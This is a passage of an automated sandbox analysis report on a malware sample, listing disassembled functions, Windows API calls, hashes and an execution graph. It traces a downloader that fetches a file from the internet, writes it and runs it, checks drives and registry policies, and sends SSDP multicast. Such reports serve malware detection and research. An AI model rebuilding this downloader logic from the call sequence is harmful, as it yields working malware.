                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DeviceDriveQueryType
                                              • String ID: \??\
                                              • API String ID: 1681518211-3047946824
                                              • Opcode ID: 1f4486d3417c416fbe6947eda0d50e0154391f7c0caa962a9d661e7b197f6568
                                              • Instruction ID: fe1cba3e8f96ca8ec28924db8accccc61f2e919e988f9d14e04ecf4ac666ff3a
                                              • Opcode Fuzzy Hash: 1f4486d3417c416fbe6947eda0d50e0154391f7c0caa962a9d661e7b197f6568
                                              • Instruction Fuzzy Hash: 1901FFB0A4021CEBCB20DF55DD49BDAB7B4AB04704F00C0BAAA05A7280E6759ED5DF9C
                                              Function 00401100 Relevance: 6.1, APIs: 4, Instructions: 86synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • ioctlsocket.WS2_32 ref: 0040112B
                                              • recvfrom.WS2_32 ref: 0040119C
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
                                              • WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                              • String ID:
                                              • API String ID: 3980219359-0
                                              • Opcode ID: 9fd04ca368f2f0733dbd00e11fcdc64336c0dc17fc499274760987b24178d786
                                              • Instruction ID: e1b7ef358c802af59afb00f280b99e3e8e19274dac2adc7c4e0c886c1a13037e
                                              • Opcode Fuzzy Hash: 9fd04ca368f2f0733dbd00e11fcdc64336c0dc17fc499274760987b24178d786
                                              • Instruction Fuzzy Hash: 1521C3B1504301AFD304DF65DC84A6BB7E9EF88314F004A3EF555A62A0E774DD488BEA
                                              Function 00401F50 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
                                              • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
                                              • WSAGetLastError.WS2_32 ref: 00401FB9
                                              • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                              • String ID:
                                              • API String ID: 2074799992-0
                                              • Opcode ID: 6bed54afebf4a7a641f0d3d0188a4da0f589ce10c8675e9945177f158b09e6ba
                                              • Instruction ID: 85cdc4ac02e7a7d961e62fa06f42dc9c3305788cd6d7a2bd32de2e1c20a60a18
                                              • Opcode Fuzzy Hash: 6bed54afebf4a7a641f0d3d0188a4da0f589ce10c8675e9945177f158b09e6ba
                                              • Instruction Fuzzy Hash: DD212F715083159BC200DF55D884D5BB7E8BFCCB54F044A2EF59493291D734EA49CBAA
                                              Function 00407300 Relevance: 6.1, APIs: 4, Instructions: 60sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • StrChrA.SHLWAPI(00000000,0000007C), ref: 00407326
                                              • DeleteUrlCacheEntry.WININET(00000000), ref: 00407348
                                              • Sleep.KERNEL32(000003E8), ref: 00407361
                                              • DeleteUrlCacheEntry.WININET(?), ref: 00407389
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CacheDeleteEntry$Sleep
                                              • String ID:
                                              • API String ID: 672405725-0
                                              • Opcode ID: de31647e4212ff5a036519ed2976cc2a7ac52ffd671279e5da701e067ce87bdf
                                              • Instruction ID: 2037616d4c8183bc1dcd880db7f677971b3714fceeeaba453b7e7dde7ca31e21
                                              • Opcode Fuzzy Hash: de31647e4212ff5a036519ed2976cc2a7ac52ffd671279e5da701e067ce87bdf
                                              • Instruction Fuzzy Hash: CC217F75E04208FBDB04DFA4D885B9EBB74AF45305F10C1B9ED016B391D679AA80DB49
                                              Function 00401C50 Relevance: 6.1, APIs: 4, Instructions: 59networksleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
                                              • WSAGetLastError.WS2_32(?,?,004021A5,00000000), ref: 00401C90
                                              • Sleep.KERNEL32(00000001,?,?,004021A5,00000000), ref: 00401CA6
                                              • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Recv$ErrorLastSleep
                                              • String ID:
                                              • API String ID: 3668019968-0
                                              • Opcode ID: 115ea0e646e0c4f71d919f36be7c9bac7cbabd22de7b6b0e5f0bd0a6bc0a71ea
                                              • Instruction ID: df3cbe2ca7d05c2b70b960210cdf5b20c1916dde76b22b2cec88194eea221140
                                              • Opcode Fuzzy Hash: 115ea0e646e0c4f71d919f36be7c9bac7cbabd22de7b6b0e5f0bd0a6bc0a71ea
                                              • Instruction Fuzzy Hash: 6A11AD72148305AFD310CF65EC84AEBB7ECEB88710F40492AF945D2140E679E94997B6
                                              Function 00401AE0 Relevance: 6.0, APIs: 4, Instructions: 49networksleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
                                              • WSAGetLastError.WS2_32 ref: 00401B12
                                              • Sleep.KERNEL32(00000001), ref: 00401B28
                                              • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Send$ErrorLastSleep
                                              • String ID:
                                              • API String ID: 2121970615-0
                                              • Opcode ID: 68b99e883f80ec4d8e473af3bb6ab78542c6fab184647b02e4118960a37caac2
                                              • Instruction ID: 6027246a5f20d5291fae036152240cd5c1f9414458335baedc5b4335fd2ad738
                                              • Opcode Fuzzy Hash: 68b99e883f80ec4d8e473af3bb6ab78542c6fab184647b02e4118960a37caac2
                                              • Instruction Fuzzy Hash: 8F014F712483046EE7209B96DC88F9B77A8EBC4711F508429F608961C0D7B5A9459B79
                                              Function 0040D9A0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                              Download Yara Rule
                                              APIs
                                              • EnterCriticalSection.KERNEL32(?), ref: 0040D9B9
                                              • CloseHandle.KERNEL32(?), ref: 0040D9E8
                                              • LeaveCriticalSection.KERNEL32(?), ref: 0040D9F7
                                              • DeleteCriticalSection.KERNEL32(?), ref: 0040DA04
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                              • String ID:
                                              • API String ID: 3102160386-0
                                              • Opcode ID: ed15acf6120be580f2efb04119f98ac13af0f23ee5fa2c95d393dc01a9c3cf4d
                                              • Instruction ID: da3f5db6e059a7c592b49e611c360a1232ff957d222e4d531544d3c603d0b457
                                              • Opcode Fuzzy Hash: ed15acf6120be580f2efb04119f98ac13af0f23ee5fa2c95d393dc01a9c3cf4d
                                              • Instruction Fuzzy Hash: 2A1121B4E00208EBDB08DF94D984A9DB775FF44309F1081A9E806A7341D739EF95DB85
                                              Function 004017A0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                              Download Yara Rule
                                              APIs
                                              • EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                              • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                              • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                              • String ID:
                                              • API String ID: 2223660684-0
                                              • Opcode ID: 03c0a71711caba3423ec18258d7e67e7f1e7096498cee499a2df36c29d80c934
                                              • Instruction ID: 660f416c0ba452cd5c41a421238d9990710d8623252f526507a58679470d43f9
                                              • Opcode Fuzzy Hash: 03c0a71711caba3423ec18258d7e67e7f1e7096498cee499a2df36c29d80c934
                                              • Instruction Fuzzy Hash: 2301F27A242300AFC3209F26ED84A9B73F8AF85B11F00443EE546E3A50DB39E401CB28
                                              Function 00406F70 Relevance: 6.0, APIs: 4, Instructions: 22memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CoInitializeEx.OLE32(00000000,00000002,?,?,00407FB7), ref: 00406F78
                                              • SysAllocString.OLEAUT32(00417B18), ref: 00406F83
                                              • CoUninitialize.OLE32 ref: 00406FA8
                                                • Part of subcall function 00406FC0: SysFreeString.OLEAUT32(00000000), ref: 004071D8
                                              • SysFreeString.OLEAUT32(00000000), ref: 00406FA2
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: String$Free$AllocInitializeUninitialize
                                              • String ID:
                                              • API String ID: 459949847-0
                                              • Opcode ID: 04d1d2bcffda370cb2b5a7ceb5013a9587be47d2db71fc951fd56c3c7d876cd0
                                              • Instruction ID: 7397cee9579370c29f446d7a93da1be4fc5365a48f81cc5ba3db23e82f7acdfe
                                              • Opcode Fuzzy Hash: 04d1d2bcffda370cb2b5a7ceb5013a9587be47d2db71fc951fd56c3c7d876cd0
                                              • Instruction Fuzzy Hash: 22E0D8B4940308FBCB00DBE0ED0EB8D7734EB04315F004074F90267291DAB95E80C755
                                              Function 00406FC0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00407250: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407270
                                              • SysFreeString.OLEAUT32(00000000), ref: 004071D8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFreeInstanceString
                                              • String ID: Microsoft Corporation
                                              • API String ID: 586785272-3838278685
                                              • Opcode ID: 47348544a12607a113ad889ec3bd29dddf14831e53aa8f734b6601f1a55deb08
                                              • Instruction ID: e6ff3ca51e6e637cb53d631dd4329f9e07d4b07e7a8aed38044ad589faa32fb5
                                              • Opcode Fuzzy Hash: 47348544a12607a113ad889ec3bd29dddf14831e53aa8f734b6601f1a55deb08
                                              • Instruction Fuzzy Hash: 0F91EC75A0410ADFCB04DF98C894AAFB3B5BF89304F208169E515BB3E0D774AD41CBA6
                                              Function 0040DF10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0040E150: memset.NTDLL ref: 0040E178
                                                • Part of subcall function 0040E150: InternetCrackUrlA.WININET(0040DC29,00000000,10000000,0000003C), ref: 0040E1C8
                                                • Part of subcall function 0040E150: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E1D8
                                                • Part of subcall function 0040E150: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E211
                                                • Part of subcall function 0040E150: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E247
                                                • Part of subcall function 0040E150: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E26F
                                                • Part of subcall function 0040E150: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E2B8
                                                • Part of subcall function 0040E150: InternetCloseHandle.WININET(00000000), ref: 0040E347
                                                • Part of subcall function 0040E040: SysAllocString.OLEAUT32(00000000), ref: 0040E06E
                                                • Part of subcall function 0040E040: CoCreateInstance.OLE32(00412A18,00000000,00004401,00412A08,00000000), ref: 0040E096
                                                • Part of subcall function 0040E040: SysFreeString.OLEAUT32(00000000), ref: 0040E131
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040DFEB
                                              • SysFreeString.OLEAUT32(00000000), ref: 0040DFF5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                              • String ID: %S%S
                                              • API String ID: 1017111014-3267608656
                                              • Opcode ID: 8050ae28274428bf3bfa8973c943a31095365cba4dcb11065546cc064dfc1af3
                                              • Instruction ID: 0d7a9dfb02ef55e8037a527aa51067439edd5703c05fc0bf7ce6e387078fb77b
                                              • Opcode Fuzzy Hash: 8050ae28274428bf3bfa8973c943a31095365cba4dcb11065546cc064dfc1af3
                                              • Instruction Fuzzy Hash: 3E416BB5E002099FCB04DBE5C885AEFB7B4BF88304F108929E505B7391D778AA45CBA1
                                              Function 0040DBD0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON
                                              Download Yara Rule
                                              APIs
                                              • CoInitializeEx.OLE32(00000000,00000002,?,?,?,00407FB2), ref: 0040DBDA
                                                • Part of subcall function 0040DCA0: socket.WS2_32(00000002,00000002,00000011), ref: 0040DCBA
                                                • Part of subcall function 0040DCA0: htons.WS2_32(0000076C), ref: 0040DCF0
                                                • Part of subcall function 0040DCA0: inet_addr.WS2_32(239.255.255.250), ref: 0040DCFF
                                                • Part of subcall function 0040DCA0: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040DD1D
                                                • Part of subcall function 0040DCA0: bind.WS2_32(000000FF,?,00000010), ref: 0040DD53
                                                • Part of subcall function 0040DCA0: lstrlenA.KERNEL32(00411D70,00000000,?,00000010), ref: 0040DD6C
                                                • Part of subcall function 0040DCA0: sendto.WS2_32(000000FF,00411D70,00000000), ref: 0040DD7B
                                                • Part of subcall function 0040DCA0: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040DD95
                                                • Part of subcall function 0040DF10: SysFreeString.OLEAUT32(00000000), ref: 0040DFEB
                                                • Part of subcall function 0040DF10: SysFreeString.OLEAUT32(00000000), ref: 0040DFF5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                              • String ID: TCP$UDP
                                              • API String ID: 1519345861-1097902612
                                              • Opcode ID: eec8d27479aca65ce9d536c40e716b47b94f3bf0f210a133f1cac4c1684116a5
                                              • Instruction ID: a00cbb5bcfca6c5959655f637b3ec774768ac2685424fa301eff230043eb3e38
                                              • Opcode Fuzzy Hash: eec8d27479aca65ce9d536c40e716b47b94f3bf0f210a133f1cac4c1684116a5
                                              • Instruction Fuzzy Hash: A011B4B4D04208EBEB00EBD4DD85FAE7774EB44308F14886EE511772C2D6B86A54DB59
                                              Function 00405E50 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                              Download Yara Rule
                                              APIs
                                              • EnterCriticalSection.KERNEL32(004174D8,?,00000000,?), ref: 00405E5F
                                              • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405E9E
                                              • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F13
                                              • LeaveCriticalSection.KERNEL32(004174D8), ref: 00405F30
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalSectionmemcpy$EnterLeave
                                              • String ID:
                                              • API String ID: 469056452-0
                                              • Opcode ID: 4996b29259c9349675d46381685df80cb9fbc453c004c8ef9eea7ef5662ad9f1
                                              • Instruction ID: 40e991b6b4618cd04087b2a5cfa683f62b0bf83616b4f0bda180c9645beb9567
                                              • Opcode Fuzzy Hash: 4996b29259c9349675d46381685df80cb9fbc453c004c8ef9eea7ef5662ad9f1
                                              • Instruction Fuzzy Hash: C2218B70904208ABCB04DB94D885BDEBBB5EB94304F1481BAE845672C1C77CAA85CB9A

                                              Execution Graph

                                              Execution Coverage:35%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:11.5%
                                              Total number of Nodes:113
                                              Total number of Limit Nodes:3
                                              execution_graph 356 6e17ce 361 6e1bdd 356->361 359 6e1818 360 6e1810 _amsg_exit 360->359 364 6e1b38 361->364 363 6e17d8 __wgetmainargs 363->359 363->360 371 6e1dac 364->371 366 6e1b44 _decode_pointer 367 6e1b5b _onexit 366->367 368 6e1b67 7 API calls 366->368 369 6e1bcb __onexit 367->369 372 6e1bd4 _unlock 368->372 369->363 371->366 372->369 384 6e1ad8 387 6e1e58 384->387 386 6e1add 386->386 388 6e1e7d 387->388 389 6e1e8a GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 387->389 388->389 390 6e1e81 388->390 389->390 390->386 269 6e1819 289 6e1dac 269->289 271 6e1825 GetStartupInfoW 272 6e1856 InterlockedCompareExchange 271->272 273 6e1867 272->273 274 6e1863 272->274 276 6e1888 _amsg_exit 273->276 277 6e1892 273->277 274->273 275 6e186f Sleep 274->275 275->272 278 6e18bb 276->278 277->278 279 6e189b _initterm_e 277->279 280 6e18ca _initterm 278->280 281 6e18e5 278->281 279->278 283 6e18b6 __onexit 279->283 280->281 282 6e18ea InterlockedExchange 281->282 287 6e18f2 __IsNonwritableInCurrentImage 281->287 282->287 284 6e19c2 284->283 285 6e19ca _cexit 284->285 285->283 287->283 287->284 288 6e1976 exit 287->288 290 6e16a0 Sleep 287->290 288->287 289->271 306 6e10b0 ExpandEnvironmentStringsW wsprintfW PathFileExistsW 290->306 293 6e17a1 293->287 295 6e1742 wsprintfA strcmp 297 6e1776 295->297 298 6e1780 295->298 300 6e12f0 25 API calls 297->300 322 6e14e0 memset GetModuleHandleW 298->322 299 6e16d3 299->295 316 6e1150 299->316 300->298 303 6e1799 342 6e1640 303->342 307 6e10fd 306->307 308 6e1103 CreateFileW 306->308 307->293 310 6e1230 GetLogicalDrives 307->310 308->307 309 6e112e CloseHandle 308->309 309->307 315 6e125d 310->315 311 6e126c RegOpenKeyExW 313 6e128e RegQueryValueExW 311->313 311->315 312 6e12d6 312->299 314 6e12ca RegCloseKey 313->314 313->315 314->315 315->311 315->312 315->314 317 6e116c 316->317 318 6e11a9 316->318 346 6e11b0 GetDriveTypeW 317->346 318->299 321 6e119b lstrcpyW 321->318 323 6e1634 322->323 324 6e1531 GetProcAddress 322->324 323->303 330 6e12f0 9 API calls 323->330 324->323 325 6e1556 324->325 325->323 326 6e157d memset GetVersionExA 325->326 328 6e15b8 325->328 326->328 327 6e15dd memset GetVersionExA 327->323 329 6e15d0 327->329 328->323 328->327 328->329 329->323 331 6e14c3 InternetCloseHandle 330->331 332 6e13b3 InternetOpenUrlW 330->332 331->303 333 6e14b6 InternetCloseHandle 332->333 334 6e13e2 CreateFileW 332->334 333->331 335 6e14a9 CloseHandle 334->335 336 6e1411 InternetReadFile 334->336 335->333 337 6e1464 CloseHandle wsprintfW DeleteFileW 336->337 338 6e1435 336->338 351 6e1000 memset memset CreateProcessW 337->351 338->337 339 6e143e WriteFile 338->339 339->336 343 6e165c 342->343 344 6e12f0 25 API calls 343->344 345 6e1676 343->345 344->345 345->293 347 6e11d8 346->347 348 6e118f 346->348 347->348 349 6e11ec QueryDosDeviceW 347->349 348->318 348->321 349->348 350 6e1206 StrCmpNW 349->350 350->348 352 6e1062 Sleep 351->352 353 6e1071 ShellExecuteW 351->353 354 6e10a6 352->354 353->354 355 6e1097 Sleep 353->355 354->335 355->354 373 6e19a6 374 6e19bb _exit 373->374 375 6e19c2 373->375 374->375 376 6e19ca _cexit 375->376 377 6e19d0 __onexit 375->377 376->377 391 6e19f7 393 6e1a05 __set_app_type _encode_pointer __p__fmode __p__commode 391->393 394 6e1aa4 _pre_c_init __RTC_Initialize 393->394 395 6e1abe 394->395 396 6e1ab2 __setusermatherr 394->396 401 6e1e2a _controlfp_s 395->401 396->395 399 6e1acc _configthreadlocale 400 6e1ad5 399->400 402 6e1e46 _invoke_watson 401->402 403 6e1ac3 401->403 402->403 403->399 403->400 378 6e1b24 SetUnhandledExceptionFilter 379 6e1e05 _except_handler4_common 380 6e1ae2 381 6e1b1e 380->381 383 6e1af4 380->383 382 6e1b19 ?terminate@ 382->381 383->381 383->382 404 6e1992 _XcptFilter

                                              Callgraph

                                              Executed Functions

                                              Function 006E10B0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 41fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 006E10CA
                                              • wsprintfW.USER32 ref: 006E10E3
                                              • PathFileExistsW.KERNELBASE(?), ref: 006E10F3
                                              • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000002,00000000), ref: 006E1119
                                              • CloseHandle.KERNELBASE(000000FF), ref: 006E1135
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2367181590.00000000006E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true
                                              • Associated: 00000006.00000002.2367167524.00000000006E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000006.00000002.2367211185.00000000006E4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000006.00000002.2367223368.00000000006E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6e0000_158752420.jbxd
                                              Similarity
                                              • API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
                                              • String ID: %s\afaefefaeff.txt$%temp%
                                              • API String ID: 750032643-3182922545
                                              • Opcode ID: 2e084f7c60150b48aed201b5480923c8e7b0fecd98a9bad3c0e1cde9c144cf8f
                                              • Instruction ID: bffd66e87146524a25c507e8736082c651f1cd9ecc74feb6db9c479d75238e07
                                              • Opcode Fuzzy Hash: 2e084f7c60150b48aed201b5480923c8e7b0fecd98a9bad3c0e1cde9c144cf8f
                                              • Instruction Fuzzy Hash: B801A7B0540368BBD720DB60DC8EFE57339AB45700F4045D8A7159B2D1D6B05BC59FA4
                                              Function 006E1230 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55registryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 6 6e1230-6e125b GetLogicalDrives 7 6e1266-6e126a 6->7 8 6e126c-6e128c RegOpenKeyExW 7->8 9 6e12d6-6e12e1 7->9 10 6e128e-6e12b9 RegQueryValueExW 8->10 11 6e12d4 8->11 12 6e12ca-6e12ce RegCloseKey 10->12 13 6e12bb-6e12bf 10->13 11->7 12->11 13->12 15 6e12c1-6e12c7 13->15 15->12
                                              APIs
                                              • GetLogicalDrives.KERNELBASE ref: 006E1236
                                              • RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 006E1284
